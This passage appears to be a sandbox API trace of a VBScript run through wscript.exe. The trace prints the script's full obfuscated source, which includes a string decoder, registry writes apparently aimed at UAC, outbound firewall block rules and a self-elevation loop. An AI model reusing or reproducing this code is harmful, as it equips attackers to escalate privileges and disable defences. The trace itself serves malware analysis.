\"C:\\Users\\Public\\N3Eg\\N3E.vbs\" uac" [0226.121] lstrlenW (lpString="\"C:\\Windows\\System32\\wscript.exe\" \"C:\\Users\\Public\\N3Eg\\N3E.vbs\" uac") returned 68 [0226.121] GetCurrentThreadId () returned 0x8c0 [0226.121] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25fa04 | out: phkResult=0x25fa04*=0x7c) returned 0x0 [0226.121] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25fa08 | out: phkResult=0x25fa08*=0x80) returned 0x0 [0226.121] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25edb8, lpData=0x25edbc, lpcbData=0x25edb4*=0x400 | out: lpType=0x25edb8*=0x0, lpData=0x25edbc*=0x0, lpcbData=0x25edb4*=0x400) returned 0x2 [0226.122] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x25edb8, lpData=0x25edbc, lpcbData=0x25edb4*=0x400 | out: lpType=0x25edb8*=0x0, lpData=0x25edbc*=0x0, lpcbData=0x25edb4*=0x400) returned 0x2 [0226.122] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x25edb8, lpData=0x25edbc, lpcbData=0x25edb4*=0x400 | out: lpType=0x25edb8*=0x0, lpData=0x25edbc*=0x0, lpcbData=0x25edb4*=0x400) returned 0x2 [0226.122] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0226.129] RegCloseKey (hKey=0x80) returned 0x0 [0226.129] RegCloseKey (hKey=0x7c) returned 0x0 [0226.130] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f7d4 | out: phkResult=0x25f7d4*=0x7c) returned 0x0 [0226.130] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f7d0 | out: phkResult=0x25f7d0*=0x80) returned 0x0 [0226.130] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25eb60, lpData=0x25eb64, lpcbData=0x25eb5c*=0x400 | out: lpType=0x25eb60*=0x0, lpData=0x25eb64*=0x0, lpcbData=0x25eb5c*=0x400) returned 0x2 [0226.130] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x25eb60, lpData=0x25eb64, lpcbData=0x25eb5c*=0x400 | out: lpType=0x25eb60*=0x0, lpData=0x25eb64*=0x0, lpcbData=0x25eb5c*=0x400) returned 0x2 [0226.130] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x25eb60, lpData=0x25eb64, lpcbData=0x25eb5c*=0x400 | out: lpType=0x25eb60*=0x0, lpData=0x25eb64*=0x0, lpcbData=0x25eb5c*=0x400) returned 0x2 [0226.130] RegCloseKey (hKey=0x80) returned 0x0 [0226.130] RegCloseKey (hKey=0x7c) returned 0x0 [0226.130] GetACP () returned 0x4e4 [0226.130] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75900000 [0226.130] GetProcAddress (hModule=0x75900000, lpProcName="HeapSetInformation") returned 0x75954157 [0226.130] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0226.130] FreeLibrary (hLibModule=0x75900000) returned 1 [0226.131] CoRegisterMessageFilter (in: lpMessageFilter=0x2a12c8, lplpMessageFilter=0x2a12d0 | out: lplpMessageFilter=0x2a12d0*=0x0) returned 0x0 [0226.131] IUnknown:AddRef (This=0x2a12c8) returned 0x2 [0226.131] GetModuleFileNameW (in: hModule=0x80000, lpFilename=0x25fa44, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\wscript.exe") returned 0x1f [0226.131] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\wscript.exe", lpdwHandle=0x25f458 | out: lpdwHandle=0x25f458) returned 0x704 [0226.131] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\wscript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x25ed40 | out: lpData=0x25ed40) returned 1 [0226.131] VerQueryValueW (in: pBlock=0x25ed40, lpSubBlock="\\", lplpBuffer=0x25f454, puLen=0x25f450 | out: lplpBuffer=0x25f454*=0x25ed68, puLen=0x25f450) returned 1 [0226.131] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f468 | out: phkResult=0x25f468*=0x7c) returned 0x0 [0226.131] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25e834, lpData=0x25e838, lpcbData=0x25e830*=0x400 | out: lpType=0x25e834*=0x0, lpData=0x25e838*=0xed, lpcbData=0x25e830*=0x400) returned 0x2 [0226.131] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f464 | out: phkResult=0x25f464*=0x80) returned 0x0 [0226.131] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x25f42c, lpData=0x25f460, lpcbData=0x25f434*=0x4 | out: lpType=0x25f42c*=0x0, lpData=0x25f460*=0x8f, lpcbData=0x25f434*=0x4) returned 0x2 [0226.131] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x25e834, lpData=0x25e838, lpcbData=0x25e830*=0x400 | out: lpType=0x25e834*=0x0, lpData=0x25e838*=0xed, lpcbData=0x25e830*=0x400) returned 0x2 [0226.131] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x25f42c, lpData=0x25f460, lpcbData=0x25f434*=0x4 | out: lpType=0x25f42c*=0x0, lpData=0x25f460*=0x8f, lpcbData=0x25f434*=0x4) returned 0x2 [0226.132] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x25e834, lpData=0x25e838, lpcbData=0x25e830*=0x400 | out: lpType=0x25e834*=0x1, lpData="1", lpcbData=0x25e830*=0x4) returned 0x0 [0226.132] lstrlenW (lpString="1") returned 1 [0226.132] lstrlenW (lpString="0") returned 1 [0226.132] lstrlenW (lpString="1") returned 1 [0226.132] lstrlenW (lpString="no") returned 2 [0226.132] lstrlenW (lpString="1") returned 1 [0226.132] lstrlenW (lpString="false") returned 5 [0226.132] RegCloseKey (hKey=0x80) returned 0x0 [0226.132] RegCloseKey (hKey=0x7c) returned 0x0 [0226.132] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x25f474, lpdwDisposition=0x0 | out: phkResult=0x25f474*=0x7c, lpdwDisposition=0x0) returned 0x0 [0226.132] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x25f438, lpData=0x25f468, lpcbData=0x25f440*=0x4 | out: lpType=0x25f438*=0x0, lpData=0x25f468*=0xb0, lpcbData=0x25f440*=0x4) returned 0x2 [0226.132] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x25e840, lpData=0x25e844, lpcbData=0x25e83c*=0x400 | out: lpType=0x25e840*=0x1, lpData="1", lpcbData=0x25e83c*=0x4) returned 0x0 [0226.132] lstrlenW (lpString="1") returned 1 [0226.132] lstrlenW (lpString="0") returned 1 [0226.132] lstrlenW (lpString="1") returned 1 [0226.132] lstrlenW (lpString="no") returned 2 [0226.132] lstrlenW (lpString="1") returned 1 [0226.132] lstrlenW (lpString="false") returned 5 [0226.132] RegCloseKey (hKey=0x7c) returned 0x0 [0226.132] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x25f474, lpdwDisposition=0x0 | out: phkResult=0x25f474*=0x7c, lpdwDisposition=0x0) returned 0x0 [0226.133] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x25f438, lpData=0x25f468, lpcbData=0x25f440*=0x4 | out: lpType=0x25f438*=0x0, lpData=0x25f468*=0xb0, lpcbData=0x25f440*=0x4) returned 0x2 [0226.133] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x25e840, lpData=0x25e844, lpcbData=0x25e83c*=0x400 | out: lpType=0x25e840*=0x0, lpData=0x25e844*=0x31, lpcbData=0x25e83c*=0x400) returned 0x2 [0226.133] RegCloseKey (hKey=0x7c) returned 0x0 [0226.133] lstrlenW (lpString="C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 28 [0226.133] lstrlenW (lpString="vbs") returned 3 [0226.133] lstrlenW (lpString="WSH") returned 3 [0226.133] LoadStringW (in: hInstance=0x80000, uID=0x9c5, lpBuffer=0x25d7c4, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0226.133] LoadTypeLib (in: szFile="C:\\Windows\\System32\\wscript.exe", pptlib=0x25efec*=0x0 | out: pptlib=0x25efec*=0x3aed88) returned 0x0 [0226.137] ITypeLib:GetTypeInfoType (in: This=0x3aed88, index=0x81acc, pTKind=0x25efd4 | out: pTKind=0x25efd4*=3866300) returned 0x0 [0226.149] SafeArrayPutElement (psa=0x3ae5c0, rgIndices=0x25efc0, pv=0x25efa8) returned 0x0 [0226.149] SafeArrayPutElement (psa=0x3aebe8, rgIndices=0x25ef80, pv=0x25ef68) returned 0x0 [0226.149] ITypeLib:GetTypeInfoType (in: This=0x3aed88, index=0x83c7c, pTKind=0x25efc4 | out: pTKind=0x25efc4*=3866388) returned 0x0 [0226.149] ITypeLib:GetTypeInfoType (in: This=0x3aed88, index=0x83c8c, pTKind=0x25efc4 | out: pTKind=0x25efc4*=3866476) returned 0x0 [0226.149] ITypeLib:GetTypeInfoType (in: This=0x3aed88, index=0x81cac, pTKind=0x25efc4 | out: pTKind=0x25efc4*=3866564) returned 0x0 [0226.150] IUnknown:Release (This=0x3aed88) returned 0x4 [0226.150] GetCurrentThreadId () returned 0x8c0 [0226.150] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc [0226.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x82f25, lpParameter=0x2a23e0, dwCreationFlags=0x0, lpThreadId=0x2a23f4 | out: lpThreadId=0x2a23f4*=0x490) returned 0xd4 [0226.151] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x25f1ec*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0226.175] CloseHandle (hObject=0xcc) returned 1 [0226.175] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs", nBufferLength=0x104, lpBuffer=0x25f24c, lpFilePart=0x25f238 | out: lpBuffer="C:\\Users\\Public\\N3Eg\\N3E.vbs", lpFilePart=0x25f238*="N3E.vbs") returned 0x1c [0226.175] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e7e0 | out: phkResult=0x25e7e0*=0xe6) returned 0x0 [0226.176] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x25e7a8, lpData=0x25e7e4, lpcbData=0x25e7ac*=0x800 | out: lpType=0x25e7a8*=0x1, lpData="VBSFile", lpcbData=0x25e7ac*=0x10) returned 0x0 [0226.176] RegCloseKey (hKey=0xe6) returned 0x0 [0226.176] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e7e0 | out: phkResult=0x25e7e0*=0xe6) returned 0x0 [0226.176] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x25e7a8, lpData=0x25f01c, lpcbData=0x25e7ac*=0x200 | out: lpType=0x25e7a8*=0x1, lpData="VBScript", lpcbData=0x25e7ac*=0x12) returned 0x0 [0226.176] RegCloseKey (hKey=0xe6) returned 0x0 [0226.177] CLSIDFromString (in: lpsz="VBScript", pclsid=0x25efec | out: pclsid=0x25efec*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0226.177] CoCreateInstance (in: rclsid=0x25efec*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x81aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25efe8 | out: ppv=0x25efe8*=0x2a2860) returned 0x0 [0226.185] __dllonexit () returned 0x6c4d7164 [0226.185] __dllonexit () returned 0x6c4d717e [0226.185] __dllonexit () returned 0x6c4d7198 [0226.185] GetUserDefaultLCID () returned 0x409 [0226.185] GetVersion () returned 0x1db10106 [0226.185] DllGetClassObject (in: rclsid=0x3b7d44*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x76adee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25e2d4 | out: ppv=0x25e2d4*=0x2a2820) returned 0x0 [0226.186] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0x2a2820, pUnkOuter=0x0, riid=0x25ec80*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25e2c0 | out: ppvObject=0x25e2c0*=0x2a2860) returned 0x0 [0226.186] GetUserDefaultLCID () returned 0x409 [0226.186] GetACP () returned 0x4e4 [0226.186] IUnknown:AddRef (This=0x2a2860) returned 0x2 [0226.186] IUnknown:Release (This=0x2a2860) returned 0x1 [0226.186] VBScriptEngine5:IUnknown:Release (This=0x2a2820) returned 0x0 [0226.186] IUnknown:QueryInterface (in: This=0x2a2860, riid=0x81aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25efb0 | out: ppvObject=0x25efb0*=0x2a2860) returned 0x0 [0226.187] IUnknown:Release (This=0x2a2860) returned 0x1 [0226.187] GetCurrentThreadId () returned 0x8c0 [0226.187] GetCurrentThreadId () returned 0x8c0 [0226.187] GetCurrentThreadId () returned 0x8c0 [0226.188] GetUserDefaultLCID () returned 0x409 [0226.188] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0226.191] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x25efa0, cchData=6 | out: lpLCData="1252") returned 5 [0226.192] IsValidCodePage (CodePage=0x4e4) returned 1 [0226.192] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a90000 [0226.192] GetProcAddress (hModule=0x76a90000, lpProcName="CoCreateInstance") returned 0x76ad9d0b [0226.192] CoCreateInstance (in: rclsid=0x6c4cb234*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6c4cb244*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2a2a3c | out: ppv=0x2a2a3c*=0x3aa900) returned 0x0 [0226.192] IUnknown:AddRef (This=0x3aa900) returned 0x2 [0226.192] GetCurrentProcessId () returned 0x494 [0226.192] GetCurrentThreadId () returned 0x8c0 [0226.192] GetTickCount () returned 0x3fec8 [0226.192] ISystemDebugEventFire:BeginSession (This=0x3aa900, guidSourceID=0x6c4cb308, strSessionName="VBScript:00001172:00002240:18261832") returned 0x0 [0226.192] GetCurrentThreadId () returned 0x8c0 [0226.193] GetCurrentThreadId () returned 0x8c0 [0226.193] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs" (normalized: "c:\\users\\public\\n3eg\\n3e.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x100 [0226.193] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1067 [0226.193] CreateFileMappingA (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1067, lpName=0x0) returned 0x104 [0226.193] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x150000 [0226.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x150000, cbMultiByte=4199, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4199 [0226.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x150000, cbMultiByte=4199, lpWideCharStr=0x3b8b94, cchWideChar=4199 | out: lpWideCharStr="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n") returned 4199 [0226.194] UnmapViewOfFile (lpBaseAddress=0x150000) returned 1 [0226.194] CloseHandle (hObject=0x104) returned 1 [0226.194] CloseHandle (hObject=0x100) returned 1 [0226.194] GetSystemDirectoryA (in: lpBuffer=0x25f16b, uSize=0x0 | out: lpBuffer="") returned 0x14 [0226.194] GetSystemDirectoryA (in: lpBuffer=0x2a2e68, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0226.194] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x76650000 [0226.195] GetProcAddress (hModule=0x76650000, lpProcName="SaferIdentifyLevel") returned 0x76672102 [0226.195] GetProcAddress (hModule=0x76650000, lpProcName="SaferComputeTokenFromLevel") returned 0x76673352 [0226.195] GetProcAddress (hModule=0x76650000, lpProcName="SaferCloseLevel") returned 0x76673825 [0226.195] IdentifyCodeAuthzLevelW () returned 0x1 [0226.260] GetVersionExA (in: lpVersionInformation=0x25e814*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77252dd6, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25e814*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.260] GetUserDefaultLCID () returned 0x409 [0226.260] IsFileSupportedName () returned 0x1 [0226.260] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0 [0226.264] GetSignedDataMsg () returned 0x0 [0226.264] GetCurrentProcess () returned 0xffffffff [0226.264] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x104, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x25ed38, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x25ed38*=0x130) returned 1 [0226.265] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1067 [0226.266] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0226.266] ReadFile (in: hFile=0x130, lpBuffer=0x2a3660, nNumberOfBytesToRead=0x1067, lpNumberOfBytesRead=0x25ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2a3660*, lpNumberOfBytesRead=0x25ed0c*=0x1067, lpOverlapped=0x0) returned 1 [0226.266] CoInitialize (pvReserved=0x0) returned 0x1 [0226.266] CoCreateInstance (in: rclsid=0x6db11e54*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6db11d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x25ece4 | out: ppv=0x25ece4*=0x1876e68) returned 0x0 [0226.272] __dllonexit () returned 0x6dae1815 [0226.272] __dllonexit () returned 0x6dae182f [0226.272] GetVersionExA (in: lpVersionInformation=0x25d870*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x25d860, dwMinorVersion=0x2, dwBuildNumber=0x260000, 